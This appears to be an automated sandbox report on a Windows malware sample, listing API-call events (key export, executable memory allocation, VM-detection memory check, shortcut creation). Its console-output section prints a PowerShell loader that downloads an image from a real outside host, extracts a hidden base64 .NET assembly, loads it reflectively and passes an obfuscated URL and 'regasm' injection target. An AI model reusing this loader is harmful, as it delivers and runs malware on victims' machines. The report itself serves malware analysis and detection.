WriteConsoleW Dec. 8, 2023, 9:39 a.m.	buffer: FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly] console_handle: 0x0000019f	1	1
WriteConsoleW Dec. 8, 2023, 9:39 a.m.	buffer: ::Load($commandBytes);$type = $loadedAssembly.GetType('ClassLibrary3.Class1');$ console_handle: 0x000001ab	1	1
WriteConsoleW Dec. 8, 2023, 9:39 a.m.	buffer: method = $type.GetMethod('Run').Invoke($null, [object[]] ('dHh0Lk1HWi8wMDMvOC4z console_handle: 0x000001b7	1	1
WriteConsoleW Dec. 8, 2023, 9:39 a.m.	buffer: NC44MjIuNjYvLzpwdHRo' , '' , '2' , 'regasm' , '6' , 'C:\ProgramData\', 'htmlji' console_handle: 0x000001c3	1	1
WriteConsoleW Dec. 8, 2023, 9:39 a.m.	buffer: + CategoryInfo : NotSpecified: (:) [], MethodInvocationException console_handle: 0x000001db	1	1
WriteConsoleW Dec. 8, 2023, 9:39 a.m.	buffer: + FullyQualifiedErrorId : DotNetMethodException console_handle: 0x000001e7	1	1
WriteConsoleW Dec. 8, 2023, 9:39 a.m.	buffer: You cannot call a method on a null-valued expression. console_handle: 0x00000207	1	1
WriteConsoleW Dec. 8, 2023, 9:39 a.m.	buffer: At line:1 char:349 console_handle: 0x00000213	1	1
WriteConsoleW Dec. 8, 2023, 9:39 a.m.	buffer: + $imageUrl = 'https://uploaddeimagens.com.br/images/004/683/779/original/downl console_handle: 0x0000021f	1	1
WriteConsoleW Dec. 8, 2023, 9:39 a.m.	buffer: oad.jpg?1701878864';$webClient = New-Object System.Net.WebClient;$imageBytes = console_handle: 0x0000022b	1	1
WriteConsoleW Dec. 8, 2023, 9:39 a.m.	buffer: $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.Ge console_handle: 0x00000237	1	1
WriteConsoleW Dec. 8, 2023, 9:39 a.m.	buffer: tString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>> console_handle: 0x00000243	1	1
WriteConsoleW Dec. 8, 2023, 9:39 a.m.	buffer: ';$startIndex = $imageText.IndexOf <<<< ($startFlag);$endIndex = $imageText.Ind console_handle: 0x0000024f	1	1
WriteConsoleW Dec. 8, 2023, 9:39 a.m.	buffer: exOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += console_handle: 0x0000025b	1	1
WriteConsoleW Dec. 8, 2023, 9:39 a.m.	buffer: $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $ima console_handle: 0x00000267	1	1
WriteConsoleW Dec. 8, 2023, 9:39 a.m.	buffer: geText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]:: console_handle: 0x00000273	1	1
WriteConsoleW Dec. 8, 2023, 9:39 a.m.	buffer: FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly] console_handle: 0x0000027f	1	1
WriteConsoleW Dec. 8, 2023, 9:39 a.m.	buffer: ::Load($commandBytes);$type = $loadedAssembly.GetType('ClassLibrary3.Class1');$ console_handle: 0x0000028b	1	1
WriteConsoleW Dec. 8, 2023, 9:39 a.m.	buffer: method = $type.GetMethod('Run').Invoke($null, [object[]] ('dHh0Lk1HWi8wMDMvOC4z console_handle: 0x00000297	1	1
WriteConsoleW Dec. 8, 2023, 9:39 a.m.	buffer: NC44MjIuNjYvLzpwdHRo' , '' , '2' , 'regasm' , '6' , 'C:\ProgramData\', 'htmlji' console_handle: 0x000002a3	1	1
WriteConsoleW Dec. 8, 2023, 9:39 a.m.	buffer: + CategoryInfo : InvalidOperation: (IndexOf:String) [], RuntimeEx console_handle: 0x000002bb	1	1

Uses Windows APIs to generate a cryptographic key (50 out of 86 events)

Time & API	Arguments	Status	Return
CryptExportKey Dec. 8, 2023, 9:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00724a48 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 8, 2023, 9:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00724b88 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 8, 2023, 9:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00724b88 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 8, 2023, 9:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00724b88 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 8, 2023, 9:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00724388 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 8, 2023, 9:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00724388 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 8, 2023, 9:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00724388 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 8, 2023, 9:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00724388 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 8, 2023, 9:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00724388 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 8, 2023, 9:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00724388 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 8, 2023, 9:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00724b88 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 8, 2023, 9:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00724b88 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 8, 2023, 9:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00724b88 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 8, 2023, 9:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00725108 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 8, 2023, 9:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00725108 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 8, 2023, 9:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00725108 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 8, 2023, 9:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00724e08 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 8, 2023, 9:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00725108 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 8, 2023, 9:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00725108 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 8, 2023, 9:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00725108 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 8, 2023, 9:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00725108 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 8, 2023, 9:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00725108 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 8, 2023, 9:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00725108 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 8, 2023, 9:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00725108 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 8, 2023, 9:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00724ec8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 8, 2023, 9:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00724ec8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 8, 2023, 9:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00724ec8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 8, 2023, 9:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00724ec8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 8, 2023, 9:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00724ec8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 8, 2023, 9:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00724ec8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 8, 2023, 9:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00724ec8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 8, 2023, 9:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00724ec8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 8, 2023, 9:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00724ec8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 8, 2023, 9:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00724ec8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 8, 2023, 9:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00724ec8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 8, 2023, 9:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00724ec8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 8, 2023, 9:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00724ec8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 8, 2023, 9:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00724ec8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 8, 2023, 9:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00724f48 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 8, 2023, 9:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00724f48 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 8, 2023, 9:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0055b8b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 8, 2023, 9:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0055b9f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 8, 2023, 9:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0055b9f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 8, 2023, 9:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0055b9f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 8, 2023, 9:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0055b170 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 8, 2023, 9:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0055b170 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 8, 2023, 9:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0055b170 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 8, 2023, 9:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0055b170 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 8, 2023, 9:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0055b170 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 8, 2023, 9:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0055b170 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Dec. 8, 2023, 9:39 a.m.		1	1	0

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

Performs some HTTP requests (1 event)

request

GET http://apps.identrust.com/roots/dstrootcax3.p7c

Allocates read-write-execute memory (usually to unpack itself) (50 out of 292 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory Dec. 8, 2023, 9:39 a.m.	process_identifier: 2076 region_size: 1376256 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x027d0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 8, 2023, 9:39 a.m.	process_identifier: 2076 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028e0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Dec. 8, 2023, 9:39 a.m.	process_identifier: 2076 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72fd1000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 8, 2023, 9:39 a.m.	process_identifier: 2076 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x023aa000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Dec. 8, 2023, 9:39 a.m.	process_identifier: 2076 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72fd2000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 8, 2023, 9:39 a.m.	process_identifier: 2076 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x023a2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 8, 2023, 9:39 a.m.	process_identifier: 2076 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x023b2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 8, 2023, 9:39 a.m.	process_identifier: 2076 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028e1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 8, 2023, 9:39 a.m.	process_identifier: 2076 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028e2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 8, 2023, 9:39 a.m.	process_identifier: 2076 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024ca000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 8, 2023, 9:39 a.m.	process_identifier: 2076 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x023b3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 8, 2023, 9:39 a.m.	process_identifier: 2076 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x023b4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 8, 2023, 9:39 a.m.	process_identifier: 2076 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024db000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 8, 2023, 9:39 a.m.	process_identifier: 2076 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024d7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 8, 2023, 9:39 a.m.	process_identifier: 2076 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x023ab000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 8, 2023, 9:39 a.m.	process_identifier: 2076 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024c2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 8, 2023, 9:39 a.m.	process_identifier: 2076 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024d5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 8, 2023, 9:39 a.m.	process_identifier: 2076 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x023b5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 8, 2023, 9:39 a.m.	process_identifier: 2076 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024cc000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 8, 2023, 9:39 a.m.	process_identifier: 2076 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02760000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 8, 2023, 9:39 a.m.	process_identifier: 2076 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x023b6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 8, 2023, 9:39 a.m.	process_identifier: 2076 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024dc000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 8, 2023, 9:39 a.m.	process_identifier: 2076 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024c3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 8, 2023, 9:39 a.m.	process_identifier: 2076 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024c4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 8, 2023, 9:39 a.m.	process_identifier: 2076 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024c5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 8, 2023, 9:39 a.m.	process_identifier: 2076 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024c6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 8, 2023, 9:39 a.m.	process_identifier: 2076 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024c7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 8, 2023, 9:39 a.m.	process_identifier: 2076 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024c8000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 8, 2023, 9:39 a.m.	process_identifier: 2076 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024c9000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 8, 2023, 9:39 a.m.	process_identifier: 2076 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028d0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 8, 2023, 9:39 a.m.	process_identifier: 2076 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028d1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 8, 2023, 9:39 a.m.	process_identifier: 2076 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028d2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 8, 2023, 9:39 a.m.	process_identifier: 2076 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028d3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 8, 2023, 9:39 a.m.	process_identifier: 2076 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028d4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 8, 2023, 9:39 a.m.	process_identifier: 2076 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028d5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 8, 2023, 9:39 a.m.	process_identifier: 2076 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028d6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 8, 2023, 9:39 a.m.	process_identifier: 2076 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028d7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 8, 2023, 9:39 a.m.	process_identifier: 2076 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028d8000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 8, 2023, 9:39 a.m.	process_identifier: 2076 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028d9000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 8, 2023, 9:39 a.m.	process_identifier: 2076 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028da000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 8, 2023, 9:39 a.m.	process_identifier: 2076 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028db000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 8, 2023, 9:39 a.m.	process_identifier: 2076 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028dc000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 8, 2023, 9:39 a.m.	process_identifier: 2076 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028dd000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 8, 2023, 9:39 a.m.	process_identifier: 2076 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028de000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 8, 2023, 9:39 a.m.	process_identifier: 2076 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028df000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 8, 2023, 9:39 a.m.	process_identifier: 2076 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04a40000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 8, 2023, 9:39 a.m.	process_identifier: 2076 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04a41000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 8, 2023, 9:39 a.m.	process_identifier: 2076 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04a42000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 8, 2023, 9:39 a.m.	process_identifier: 2076 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04a43000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 8, 2023, 9:39 a.m.	process_identifier: 2076 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04a44000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (3 events)

